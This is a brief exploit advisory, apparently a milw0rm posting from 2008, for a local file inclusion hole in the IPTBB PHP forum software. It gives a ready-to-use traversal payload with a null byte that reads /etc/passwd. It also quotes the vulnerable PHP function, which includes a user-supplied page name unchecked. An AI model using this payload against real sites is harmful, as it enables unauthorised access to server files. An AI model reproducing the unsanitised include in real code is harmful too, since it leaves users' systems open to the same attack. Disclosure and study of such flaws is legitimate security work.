____ _ _ _ ___ __ _ __ / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ | | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | | |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | ---------------------------------------------------------------------------|___/ Exploit found by sToRm IPTBB is a free forum system built using PHP and mysql. Local File Inclusion Local File Inclusion -------------------- index.php?act=../../../../../../etc/passwd%00 function action($page){ $page="main/".$page.".php"; //Include the template maker //Get the settings $setting = array(); $sql = mysql_query(" SELECT * FROM `iptbb_settings` "); while ( $row = mysql_fetch_array( $sql ) ){ $setting["{$row['name']}"] = $row['value']; } require_once('tpl.class.php'); $tpl = new template; $fileurl = 'templates/'; $template = $setting['template'] . '/'; include($page); } # milw0rm.com [2008-06-20]